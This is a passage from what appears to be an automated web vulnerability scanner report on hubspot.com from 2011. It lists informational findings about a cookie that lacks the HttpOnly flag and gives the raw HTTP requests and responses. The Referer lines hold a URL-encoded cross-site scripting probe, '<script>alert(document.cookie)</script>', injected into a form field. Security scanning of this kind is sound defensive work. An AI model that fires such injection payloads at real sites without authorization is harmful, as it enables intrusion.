Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Content-Length: 34181
Content-Type: image/png
Last-Modified: Wed, 24 Nov 2010 19:03:49 GMT
Accept-Ranges: bytes
ETag: "fbcf2054a8ccb1:10188"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 17:00:20 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

.PNG
.
...IHDR..............p^D...UiCCPICC Profile..x..YgX.K.......sZr.9g.$Q..sf.A..$(.(".(... J.$
.x.QP1.D......;..|.}....?..gz.......PU....wTT...@xD,.......F.M.<`......7&....
...|...v.C.mY...?....
...[SNIP]...

11.103. http://www.hubspot.com/Portals/53/skins/hubspot/app/css/app.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/Portals/53/skins/hubspot/app/css/app.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/53/skins/hubspot/app/css/app.css HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Content-Length: 20542
Content-Type: text/css
Last-Modified: Mon, 09 May 2011 17:08:29 GMT
Accept-Ranges: bytes
ETag: "8892eeb76becc1:10188"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 17:00:19 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

/* App Architecture */

html div#hsnav {}

div.ISContent ul li {margin-bottom: 10px;}

html * {border:0; margin:0; outline:0; padding:0; }
html, body {height:100%; width:100%;}

html > body {display:b
...[SNIP]...

11.104. http://www.hubspot.com/Portals/53/skins/hubspot/app/css/app.custom.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/Portals/53/skins/hubspot/app/css/app.custom.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/53/skins/hubspot/app/css/app.custom.css HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4N